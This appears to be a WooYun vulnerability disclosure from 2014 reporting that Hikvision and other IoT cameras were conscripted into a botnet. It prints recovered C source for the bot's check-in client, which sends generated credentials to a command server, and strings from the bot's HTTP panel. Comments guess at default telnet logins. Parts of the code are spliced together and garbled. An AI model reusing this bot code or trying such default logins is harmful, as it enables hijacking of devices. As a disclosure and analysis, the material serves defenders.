        ret = checkSysConnect(sock); 
        if(ret < 0)
        {
             DEBUG(DEBUG_FATAL, "checkSysConnect error is %s !!!\n", strerror(errno));
            ret = -1;
            goto EXIT0;
        }
    }
    else if(ret < 0)
    {
          DEBUG(DEBUG_FATAL, "connect error is %s !!!\n", strerror(errno));
        ret = -1;
        goto EXIT0;
     
    }
    /* set BLOCK */
    flag = fcntl(sock, F_GETFL, 0);
    fcntl(sock, F_SETFL, flag & ~O_NONBLOCK);
    nSend = send(sock,&sysCmdReqHead,sizeof(SYS_CMD_HEAD),0);
    /*发送数据出错*/
    if(nSend !=  sizeof(SYS_CMD_HEAD))
    {
        DEBUG(DEBUG_FATAL, "send failed !!! error:%s \n", strerror(errno));
        ret = -1;
        goto EXIT0;
    }
	 nSend = send(sock,&sysCmdReqBody,sizeof(SYS_CMD_REQ_BODY_EX),0);
    /*发送数据出错*/
    if(nSend !=  sizeof(SYS_CMD_REQ_BODY_EX))
    {
        DEBUG(DEBUG_FATAL, "send failed !!! error:%s \n", strerror(errno));
        ret = -1;
        goto EXIT0;
    }
    nRecv = recv(sock, &sysCmdResHead, sizeof(SYS_CMD_HEAD), 0);
    if(nRecv !=  sizeof(SYS_CMD_HEAD))
    {
        DEBUG(DEBUG_FATAL, "recv failed !!! error:%s \n", strerror(errno));
        ret = -1;
        goto EXIT0;
    }
	nRecv = recv(sock, &sysCmdResBody, sizeof(SYS_CMD_RES_BODY), 0);
    if(nRecv !=  sizeof(SYS_CMD_RES_BODY))
    {
        DEBUG(DEBUG_FATAL, "recv failed !!! error:%s \n", strerror(errno));
        ret = -1;
        goto EXIT0;
    }
	
	g_sysClientInfo.modeId = sysCmdResHead.modId;
	ret = sysCmdResBody.cmdResult;
EXIT0:		  
	close(sock);
	return ret;
}
int sendUserState(void)
{
	int ret = -1;
	int sock = -1;
	int nSend = 0, nRecv = 0;
	struct sockaddr_in addrCenter;
	SYS_CMD_HEAD sysCmdReqHead = {};
	SYS_CMD_REQ_BODY_EX sysCmdReqBody = {};
	SYS_CMD_HEAD sysCmdResHead = {};
	SYS_CMD_RES_BODY sysCmdResBody = {};
	int optval = 1;
	int CenterPort = 0;
	char ip[32] = {0};
    int flag = 0;
	if(!g_sysClientInfo.init)
	{
		 DEBUG(DEBUG_FATAL,"g_sysClientInfo is not init\n");
		 return -1;
	}
	sysCmdReqHead.mark[0] =  MAGIC_NUM_1;
	sysCmdReqHead.mark[1] =  MAGIC_NUM_2_EX;
	sysCmdReqHead.version = SYS_CMD_VERSION;
	sysCmdReqHead.modId   =  g_sysClientInfo.modeId;
	sysCmdReqHead.modType =  SYS_USER_HEAT;
	//sysCmdInfo.userActionEx.userTime = time(NULL);
	
	// 只需要传送端口信息
	sprintf(sysCmdReqBody.userActionEx.userPort,"%d", g_sysClientInfo.userPort);
	strcpy(sysCmdReqBody.userActionEx.userName, g_sysClientInfo.userName);
	strcpy(sysCmdReqBody.userActionEx.userPass, g_sysClientInfo.userPass);
	DEBUG(DEBUG_FATAL,"userPort is %s\n", sysCmdReqBody.userActionEx.userPort);	
	 /* 在初始化的时候如果ADMIND_NETUPLOAD_EINCREATESOCKET，在这里再次尝试创建 */
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
    {
        DEBUG(DEBUG_FATAL, "creat sock for upload failed !!!");
        ret = -1;
        goto EXIT0;
    }
    if((setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *)&optval,sizeof(int))) < 0) 
    {
        DEBUG(DEBUG_FATAL, "setsockopt for upload failed !!!");
        ret = -1;
        goto EXIT0;
    }
 	 /*设置超时
       */
    struct timeval timeout;
    timeout.tv_sec = 5;
    timeout.tv_usec = 0;
    if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, &timeout, sizeof (timeout)) < 0) 
    {
        DEBUG(DEBUG_FATAL, "setsockopt for upload failed !!!\n");
        ret = -1;
        goto EXIT0;
    }
	   
    /* set NOBLOCK */
    flag = fcntl(sock, F_GETFL, 0);
    fcntl(sock, F_SETFL, flag | O_NONBLOCK);
	if (!resolve_ipEx(g_sysClientInfo.serverAddr, ip, SRV_ADDR))
   {
	   if(!resolve_ipEx(g_sysClientInfo.serverAddr, ip, SRV_ADDR_1))
	   {
		   DEBUG(DEBUG_FATAL, "can't get the resolve_ip \n");
		   ret = -1;
		   goto EXIT0;
	   }
	  
   }
 
    bzero(&addrCenter, sizeof(struct sockaddr_in));
    addrCenter.sin_family = AF_INET;
    addrCenter.sin_port = htons(g_sysClientInfo.serverPort);
	inet_aton(ip, &addrCenter.sin_addr);
	
	DEBUG(DEBUG_FATAL,"send user state to %s\n", ip);
    
	ret =connect(sock,(struct sockaddr *)&addrCenter,sizeof(struct sockaddr));
	if(ret < 0 && errno == EINPROGRESS)
	{
        ret = checkSysConnect(sock); 
        if(ret < 0)
        {
             DEBUG(DEBUG_FATAL, "checkSysConnect error is %s !!!\n", strerror(errno));
            ret = -2;
            goto EXIT0;
        }
    }
    else if(ret < 0)
    {
          DEBUG(DEBUG_FATAL, "connect error is %s !!!\n", strerror(errno));
        ret = -2;
        goto EXIT0;
     
    }
    /* set BLOCK */
    flag = fcntl(sock, F_GETFL, 0);
    fcntl(sock, F_SETFL, flag & ~O_NONBLOCK);
    nSend = send(sock,&sysCmdReqHead,sizeof(SYS_CMD_HEAD),0);
    /*发送数据出错*/
    if(nSend !=  sizeof(SYS_CMD_HEAD))
    {
        DEBUG(DEBUG_FATAL, "send failed !!! error:%s \n", strerror(errno));
        ret = -1;
        goto EXIT0;
    }
	 nSend = send(sock,&sysCmdReqBody,sizeof(SYS_CMD_REQ_BODY_EX),0);
    /*发送数据出错*/
    if(nSend !=  sizeof(SYS_CMD_REQ_BODY_EX))
    {
        DEBUG(DEBUG_FATAL, "send failed !!! error:%s \n", strerror(errno));
        ret = -1;
        goto EXIT0;
    }
    nRecv = recv(sock, &sysCmdResHead, sizeof(SYS_CMD_HEAD), 0);
    if(nRecv !=  sizeof(SYS_CMD_HEAD))
    {
        DEBUG(DEBUG_FATAL, "recv failed !!! error:%s \n", strerror(errno));
        ret = -1;
        goto EXIT0;
    }
	 nRecv = recv(sock, &sysCmdResBody, sizeof(SYS_CMD_RES_BODY), 0);
    if(nRecv !=  sizeof(SYS_CMD_RES_BODY))
    {
        DEBUG(DEBUG_FATAL, "recv failed !!! error:%s \n", strerror(errno));
        ret = -1;
        goto EXIT0;
    }
	
    if(sysCmdResBody.cmdResult != SYS_CMD_SUCCESS)
    {
		ret = -2;
    }
EXIT0:		  
	close(sock);
	return ret;
}
#if 0
void getIpAddr(char *ip)
{
	struct ifaddrs * ifAddrStruct=NULL;
	char tmpAddrBuff[64] = {0};
    void * tmpAddrPtr=NULL;
    getifaddrs(&ifAddrStruct);
    while (ifAddrStruct!=NULL) 
	{
        if (ifAddrStruct->ifa_addr->sa_family == AF_INET) 
		{ // check it is IP4
            // is a valid IP4 Address
            tmpAddrPtr=&((struct sockaddr_in *)ifAddrStruct->ifa_addr)->sin_addr;
           
            inet_ntop(AF_INET, tmpAddrPtr, tmpAddrBuff, 64);
			if(strcmp(tmpAddrBuff, "127.0.0.1") != 0 &&\
			   strncmp(tmpAddrBuff, "192.168", 7) != 0)
			{
f(nRecv !=  sizeof(sysCmdResInfo))
    {
        DEBUG(DEBUG_FATAL, "recv failed !!! error:%s \n", strerror(errno));
        ret = -1;
        goto EXIT0;
    }
        g_sysClientInfo.modeId = sysCmdResInfo.modId;
        ret = sysCmdResInfo.cmdResult;				strcpy(ip, tmpAddrBuff);
				break;
			}
			
            //printf("%s IP Address %s/n", ifAddrStruct->ifa_name, tmpAddrBuff); 
        }
		
        ifAddrStruct=ifAddrStruct->ifa_next;
    }
}
void getIpAddr(char *ip)
{
	char hname[128];
    struct hostent *hent;
    int i;
    gethostname(hname, sizeof(hname));
	
    hent = gethostbyname(hname);
	// 只用只一个ip
    sprintf(ip, "%s", inet_ntoa(*(struct in_addr*)(hent->h_addr_list[0])));
	printf("hostname: %s/naddress list: ", hent->h_name);
    for(i = 0; hent->h_addr_list[i]; i++) {
        printf("%s\n", inet_ntoa(*(struct in_addr*)(hent->h_addr_list[i])));
    }
	
    return;
}
void getIpAddr(char *netInterface, char *ip)
{
    int fd;
    struct ifreq ifr;
    struct sockaddr_in *our_ip = NULL;
	struct in_addr addr = {0};
    memset(&ifr, 0, sizeof(struct ifreq));
    if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) >= 0) 
    {
        ifr.ifr_addr.sa_family = AF_INET;
        strncpy(ifr.ifr_name, netInterface, sizeof(ifr.ifr_name) - 1);
        /*ip*/
        if (ioctl(fd, SIOCGIFADDR, &ifr) == 0) 
        {
            our_ip = (struct sockaddr_in *) &ifr.ifr_addr;
			memcpy(&addr, &our_ip->sin_addr.s_addr, sizeof(our_ip->sin_addr.s_addr));
        }
        /* close socket */
        close(fd);
    }
	sprintf(ip, "%s", inet_ntoa(addr));
    return;
}
// Http Get协议
static int WebGetFull(void)
{
	int sock;
	int ret = 0;
	char check_tag[64] = {};
	char ip[32];
	char response_buff[10240] = {};
	char *host = "wap.ip138.com";
	char hostIp[64] = {0};
	char *request_html ="GET http://wap.ip138.com/ip_search138.asp?ip=115.183.160.20 HTTP/1.1\r\n"
						"Host:wap.ip138.com\r\n"	
						"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
						"Connection:keep-alive\r\n\r\n";
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sock == -1)
        return sock;
    struct sockaddr_in sin;
   	if (!resolve_ip(host, ip))
        return 0;
    inet_aton(ip, &sin.sin_addr);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
	DEBUG(DEBUG_FATAL, "connect  ip is  %s\n", ip);
    if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1)
    {
    	DEBUG(DEBUG_FATAL, "connect  is error %s\n", strerror(errno));
        close(sock);
        return -1;
    }
	struct timeval timeout;
    timeout.tv_sec = 50;
    timeout.tv_usec = 0;
    if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, &timeout, sizeof (timeout)) < 0) 
    {
        DEBUG(DEBUG_FATAL, "setsockopt for upload failed !!!\n");
        return -1;
    }
	
	
    ret = send(sock,request_html,strlen(request_html) ,MSG_NOSIGNAL);
	if(ret < strlen(request_html))
	{
		DEBUG(DEBUG_FATAL, "send request_html is error %s\n", strerror(errno));
		return -1;
	}
	DEBUG(DEBUG_FATAL, "send buffer is  %s\n", request_html);
	ret = recv(sock, response_buff, sizeof(response_buff), 0);
	if(ret < 0)
	{
		DEBUG(DEBUG_FATAL, "recv response_buff is error %s\n", strerror(errno));
		return -1;
	}
	DEBUG(DEBUG_FATAL, "%s", response_buff);
	char *p, *begain, *end;
	sprintf(check_tag, "<div>%s<br/>", "115.183.160.20");
	p = strstr(response_buff, check_tag);
	if(p != NULL)
	{
		end = strchr(p, ' ');
		*end = 0;
		
		printf("#######%s#########\n", p+ strlen("<div>115.183.160.20<br/>") + 18);
	}
	close(sock);
cleanup:
    return 0;
}
#endif
void getMacAddr(char *mac)
{
	int fd;
	struct ifreq ifrbuff[16] = {0};
	struct ifconf ifc = {0};
	struct sockaddr_in *addr = {0};
	char *address;
	int intrface = 0;
    if((fd = socket(AF_INET, SOCK_DGRAM, 0)) >= 0) 
    {
	ifc.ifc_len = sizeof(ifrbuff);
	ifc.ifc_buf = (caddr_t)ifrbuff;
	if (!ioctl (fd, SIOCGIFCONF, (char *) &ifc))
	{
		intrface = ifc.ifc_len / sizeof (struct ifreq);
		while(intrface-- > 0)
		{
			if(strcmp(ifrbuff[intrface].ifr_name, "lo") != 0)
			{
				if (ioctl(fd, SIOCGIFHWADDR, (char *) &ifrbuff[intrface]) == 0) 
				{
					sprintf(mac, "%02x:%02x:%02x:%02x:%02x:%02x\n",
					(unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[0],
					(unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[1],
					(unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[2],
					(unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[3],
					(unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[4],
					(unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[5]);
					break;
				}
			}
		}
	}
        /* close socket */
        close(fd);
    }
	DEBUG(DEBUG_FATAL, "mac is %s\n", mac);
    return;
}
int sysCmdClientInit(SERVER_INFO* serverInfo, short clientPort)
{
	int ret = 0;
	if(g_sysClientInfo.init)
	{
		DEBUG(DEBUG_FATAL, "Client have inited\n");
		return 0;
	}
	g_sysClientInfo.modeId = -1;
	g_sysClientInfo.onlieTime = 0;
	strcpy(g_sysClientInfo.serverAddr, serverInfo->name);
	g_sysClientInfo.serverPort = serverInfo->port;
	g_sysClientInfo.userPort = clientPort;
	strcpy(g_sysClientInfo.userName, USER_NAME);
	getRandPasswd(g_sysClientInfo.userPass);
	DEBUG(DEBUG_FATAL, "the passwd is %s\n", g_sysClientInfo.userPass);
	
	g_sysClientInfo.init = 1;
	return 0;
}
char * sysGetUserName()
{
	if(!g_sysClientInfo.init)
	{
		DEBUG(DEBUG_FATAL, "Client not inited\n");
		return 0;
	}
	return g_sysClientInfo.userName;
}
char * sysGetUserPasswd()
{
	if(!g_sysClientInfo.init)
	{
		DEBUG(DEBUG_FATAL, "Client not inited\n");
		return 0;
	}
	return g_sysClientInfo.userPass;
}
void gettmpIpAddr(char *netInterface, char *ip)
{
    int fd;
    struct ifreq ifr;
    struct sockaddr_in *our_ip = NULL;
	struct in_addr addr = {0};
    memset(&ifr, 0, sizeof(struct ifreq));
    if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) >= 0) 
    {
        ifr.ifr_addr.sa_family = AF_INET;
        strncpy(ifr.ifr_name, netInterface, sizeof(ifr.ifr_name) - 1);
        /*ip*/
        if (ioctl(fd, SIOCGIFADDR, &ifr) == 0) 
        {
            our_ip = (struct sockaddr_in *) &ifr.ifr_addr;
			memcpy(&addr, &our_ip->sin_addr.s_addr, sizeof(our_ip->sin_addr.s_addr));
        }
        /* close socket */
        close(fd);
    }
	sprintf(ip, "%s", inet_ntoa(addr));
    return;
}

从其server端的源代码来看是http界面的管理端。

\00\00\00HTTP/1.1 200 OK
Server: wuchen's Server <0.1>
Accept-Ranges: bytes
Content-Length: %d
Connection: close
Content-Type: %s
Content-Disposition:attachment;filename = modInfo.txt
\00\00\00\00HTTP/1.1 400 ERROR
Server: wuchen's Server <0.1>
\00\00\00 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html" />
</head>
<body>
<table width="800" border="4" align="center" id="table1">
<tbody id="table2">
<tr><th align="lest">\B4\FA\C0\EDIP</th><th align="right">\B6˿\DA</th><th align="right">\C6\F4\B6\AFʱ\BC\E4</th><th align="right">\CE\EF\C0\ED\B5\D8ַ</th></tr>
%s</tbody>
</table>
<div align="center"><span style= "text-align:center;" id="spanFirst">\B5\DAһҳ	</span> <span id="spanPre">\C9\CFһҳ	</span> <span id="spanNext">\CF\C2һҳ	</span><span id="spanLast"> \D7\EE\BA\F3һҳ	</span> \B5\DA<span id="spanPageNum"></span>ҳ/\B9\B2<span id="spanTotalPage"></span>ҳ
</div><div style = "position:fixed; bottom:10px; right:5px;" ><a href="agent_info.txt" >\B5\E3\BB\F7\CF\C2\D4\D8</a> 
</div></body>
</html>
%s\00\00\00\00<script>
var theTable = document.getElementById("table2");
var totalPage = document.getElementById("spanTotalPage");
var pageNum = document.getElementById("spanPageNum");
var spanPre = document.getElementById("spanPre");
var spanNext = document.getElementById("spanNext");
var spanFirst = document.getElementById("spanFirst");
var spanLast = document.getElementById("spanLast");
var numberRowsInTable = theTable.rows.length;
var pageSize = 100;
var page = 1;
function next() {
hideTable();
currentRow = pageSize * page;
maxRow = currentRow + pageSize;
if ( maxRow > numberRowsInTable ) maxRow = numberRowsInTable;
for ( var i = currentRow; i< maxRow; i++ ) {
theTable.rows[i].style.display = '';
}
page++;
if ( maxRow == numberRowsInTable )  { nextText(); lastText(); }
showPage();
preLink();
firstLink();
}
function pre() {
hideTable();
page--;
currentRow = pageSize * page;
maxRow = currentRow - pageSize;
if ( currentRow > numberRowsInTable ) currentRow = numberRowsInTable;
for ( var i = maxRow; i< currentRow; i++ ) {
theTable.rows[i].style.display = '';
}
if ( maxRow == 0 ) { preText(); firstText(); }
showPage();
nextLink();
lastLink();
}
function first() {
hideTable();
page = 1;
for ( var i = 0; i<pageSize; i++ ) {
theTable.rows[i].style.display = '';
}
showPage();
preText();
nextLink();
lastLink();
}
function last() {
hideTable();
page = pageCount();
currentRow = pageSize * (page - 1);
for ( var i = currentRow; i<numberRowsInTable; i++ ) {
theTable.rows[i].style.display = '';
}
showPage();
preLink();
nextText();
firstLink();
}
function hideTable() {
for ( var i = 0; i<numberRowsInTable; i++ ) {
theTable.rows[i].style.display = 'none';
}
}
function showPage() {
pageNum.innerHTML = page;
}
function pageCount() {
var count = 0;
if ( numberRowsInTable%pageSize != 0 ) count = 1; 
return parseInt(numberRowsInTable/pageSize) + count;
}
function preLink() { spanPre.innerHTML = "<a href='javascript:pre();'>\C9\CFһҳ</a>"; }
function preText() { spanPre.innerHTML = "\C9\CFһҳ"; }
function nextLink() { spanNext.innerHTML = "<a href='javascript:next();'>\CF\C2һҳ</a>"; }
function nextText() { spanNext.innerHTML = "\CF\C2һҳ"; }
function firstLink() { spanFirst.innerHTML = "<a href='javascript:first();'>\B5\DAһҳ</a>"; }
function firstText() { spanFirst.innerHTML = "\B5\DAһҳ"; }
function lastLink() { spanLast.innerHTML = "<a href='javascript:last();'>\D7\EE\BA\F3һҳ</a>"; }
function lastText() { spanLast.innerHTML = "\D7\EE\BA\F3һҳ"; }
function hide() {
for ( var i = pageSize; i<numberRowsInTable; i++ ) {
theTable.rows[i].style.display = 'none';
}
totalPage.innerHTML = pageCount();
pageNum.innerHTML = '1';
nextLink();
lastLink();
}
hide();
</script>
\00httpServer.c\00\00[file]:%s ,[func: %s ,Line: %d] error: printf file_name is %s
\00\00[file]:%s ,[func: %s ,Line: %d] error: iconv_open is error
\00[file]:%s ,[func: %s ,Line: %d] error: iconv is error
\00www.ip138.com\00\00\00\00GET http://www.ip138.com/ips1388.asp?ip=%s&action=2 HTTP/1.1
Host:www.ip138.com
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection:keep-alive
\00[file]:%s ,[func: %s ,Line: %d] error: connect  ip is  %s
\00\00[file]:%s ,[func: %s ,Line: %d] error: connect  is error %s
\00\00\00\00[file]:%s ,[func: %s ,Line: %d] error: setsockopt for upload failed !!!
\00\00\00\00[file]:%s ,[func: %s ,Line: %d] error: send request_html is error %s
\00\00\00[file]:%s ,[func: %s ,Line: %d] error: send buffer is  %s
\00\00[file]:%s ,[func: %s ,Line: %d] error: recv response_buff is error %s
\00recv %d data
\00recv len is %d
\00\00\00\00[file]:%s ,[func: %s ,Line: %d] error: %s\00\00\00[file]:%s ,[func: %s ,Line: %d] error: can't search the addr
\00#######%s#########

部分http 管理页面源代码
其httpbanner很特别

###########################################
sysCmdServer.o
###########################################
Server: wuchen's Server <0.1>
Accept-Ranges: bytes
Content-Length: %d
Connection: close
Content-Type: %s
\00\00\00HTTP/1.1 200 OK
Server: wuchen's Server <0.1>
Accept-Ranges: bytes
Content-Length: %d
Connection: close
Content-Type: %s
Content-Disposition:attachment;filename = modInfo.txt

zoomeye 没找到 Server: wuchen's Server 的
源码打包放在测试代码中稍微处理了下
###########################################################################
完了吗？没完！！！！
netstat -an得到
udp 0 0 192.168.10.200:6800 218.25.10.101:6800 ESTABLISHED
218.25.10.101 是啥？百度了下是有收录的
但看上去很久以前就被抡了。
还有 tmp 目录下各种奇葩的马

修复方案：

分析源代码。摧毁僵尸网络。然后查水表吧。。。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2014-12-17 16:32

厂商回复：

CNVD确认所述情况，已经由CNVD通过以往建立的处置渠道软件生产厂商通报

漏洞评价：

2014-12-14 20:06 | sin ( 实习白帽子 | Rank:38 漏洞数:2 | 寻找最优雅的解决方案)

真有人实现了!!!!当初就觉得很有搞头.流量大,出奇意料.作为节点什么的杠杆的.
2014-12-14 21:30 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了，跪着也要...)

首个案例？@疯狗
2014-12-14 22:18 | Fire ant ( 实习白帽子 | Rank:73 漏洞数:26 | 他们回来了................)

不想说了........UDP走起
2014-12-15 10:26 | cncert国家互联网应急中心(乌云厂商)

mark
2014-12-15 11:10 | cncert国家互联网应急中心(乌云厂商)

您好：感谢您对CNVD的支持，请协助CNVD提供下发现设备的ip，型号和口令，以及能否提供几个设备的案例（至少2个），以便CNVD验证和复现并以文档的形式邮件vreport@cert.org.cn邮箱。谢谢！
2014-12-15 12:18 | Fire ant ( 实习白帽子 | Rank:73 漏洞数:26 | 他们回来了................)

我猜一定是admin admin..........
2015-03-14 19:09 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势，学思路。)

邮箱泄露，是不是可以...
2015-04-02 22:25 | Fire ant ( 实习白帽子 | Rank:73 漏洞数:26 | 他们回来了................)

telnet~~admin 123456

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-087132

漏洞标题：海康威视等监控和物联网设备被用于僵尸网络的实例

相关厂商：cncert

漏洞作者：路人甲

提交时间：2014-12-14 17:51

修复时间：2015-03-14 17:52

公开时间：2015-03-14 17:52

漏洞类型：地下0day/成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-087132

漏洞标题：海康威视等监控和物联网设备被用于僵尸网络的实例

相关厂商：cncert

漏洞作者： 路人甲

提交时间：2014-12-14 17:51

修复时间：2015-03-14 17:52

公开时间：2015-03-14 17:52

漏洞类型：地下0day/成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-087132"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云